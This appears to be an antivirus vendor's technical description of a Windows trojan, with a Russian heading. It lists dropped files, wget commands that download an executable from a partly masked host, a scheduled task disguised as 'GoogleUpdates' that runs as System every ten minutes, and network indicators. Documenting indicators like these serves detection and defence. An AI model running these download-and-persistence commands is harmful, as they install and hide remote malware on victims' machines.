Техническая информация
- %WINDIR%\Tasks\GoogleUpdates.job
- '%TEMP%\wget.exe' --save-cookies cookies.txt http://ms###st.name/1.php
- '%TEMP%\GoogleUpdates.exe'
- '%TEMP%\wget.exe' http://ms###st.name/GoogleUpdates.exe
- '%TEMP%\set.exe' -p1234567890__
- '%TEMP%\hidcon.exe' start.cmd
- '%TEMP%\GoogleUpdates.exe' (загружен из сети Интернет)
- '<SYSTEM32>\schtasks.exe' /Create /TN GoogleUpdates /TR "%APPDATA%\Updates\GoogleUpdates.exe" /SC MINUTE /mo 10 /ru "System"
- '<SYSTEM32>\find.exe' "Microsoft Windows XP"
- '<SYSTEM32>\cmd.exe' /c start.cmd
- %APPDATA%\GoogleUpdates\GoogleUpdates.exe
- %TEMP%\GoogleUpdates.exe
- %TEMP%\cookies.txt
- %TEMP%\1.php
- %TEMP%\hidcon.exe
- %TEMP%\set.exe
- %TEMP%\wget.exe
- %TEMP%\start.cmd
- %TEMP%\set.exe
- %TEMP%\start.cmd
- %TEMP%\wget.exe
- %TEMP%\hidcon.exe
- %TEMP%\1.php
- %TEMP%\cookies.txt
- %TEMP%\GoogleUpdates.exe
- 'ms###st.name':80
- ms###st.name/1.php
- ms###st.name/GoogleUpdates.exe
- DNS ASK ms###st.name
- ClassName: 'Shell_TrayWnd' WindowName: '(null)'
- ClassName: 'EDIT' WindowName: '(null)'